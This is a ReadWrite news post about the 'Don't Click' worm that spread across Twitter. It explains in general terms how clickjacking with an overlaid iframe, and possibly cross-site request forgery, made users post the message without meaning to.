Home Don’t Click! No Really! Don’t Even Think About it!

Don’t Click! No Really! Don’t Even Think About it!

Twitter is falling prey to a major security flaw right now. The service is getting swamped with messages that say: “Don’t Click” and a URL. Apparently, this hack has been around for over two weeks, but it only really took off today. If you actually click on the link while you are logged into Twitter, another “Don’t Click” message will be posted to your Twitter account, which then propagates the cycle.

Of course, this is also very smart social engineering. Who, after all, can resist clicking on a link that says “Don’t Click.”

No matter how annoying, though, it doesn’t look like this hack does anything more nefarious than post this message to your account. We will keep this post updated as we get more information.

Update I: Evan Williams just announced that Twitter is working on a fix right now and the messages have now finally stopped.

Update II: As one our commenters points out below, this might also be a far simpler hack, where the hacker simply overlays on iFrame over the Twitter status update. While you think you are clicking on a link on another site, you are, in reality, clicking on the ‘Update’ button on Twitter. Looking at the screen shot above, that does indeed seem to be the case. Here is a good description of how this works in detail.

Note: This was our first theory of how this hack worked – turns out, it was way simpler than this: According to Jeff Attwood, this hack could also be making use of a known security flaw called a cross-site request forgery. We are no security experts, but our understanding is that this hack spoofs a request from your browser to Twitter. This only works, as far as we can see, when a service like Twitter allows a user to perform a sensitive action without checking if the user has actually invoked this action (like posting to Twitter) him/herself. If you visit a malicious web site that is vulnerable to this hack, then the attacker can force your browser to send out a request to perform an action on your behalf without you ever knowing about it.

About ReadWrite’s Editorial Process

The ReadWrite Editorial policy involves closely monitoring the tech industry for major developments, new product launches, AI breakthroughs, video game releases and other newsworthy events. Editors assign relevant stories to staff writers or freelance contributors with expertise in each particular topic area. Before publication, articles go through a rigorous round of editing for accuracy, clarity, and to ensure adherence to ReadWrite's style guidelines.

Get the biggest tech headlines of the day delivered to your inbox

    By signing up, you agree to our Terms and Privacy Policy. Unsubscribe anytime.

    Tech News

    Explore the latest in tech with our Tech News. We cut through the noise for concise, relevant updates, keeping you informed about the rapidly evolving tech landscape with curated content that separates signal from noise.

    In-Depth Tech Stories

    Explore tech impact in In-Depth Stories. Narrative data journalism offers comprehensive analyses, revealing stories behind data. Understand industry trends for a deeper perspective on tech's intricate relationships with society.

    Expert Reviews

    Empower decisions with Expert Reviews, merging industry expertise and insightful analysis. Delve into tech intricacies, get the best deals, and stay ahead with our trustworthy guide to navigating the ever-changing tech market.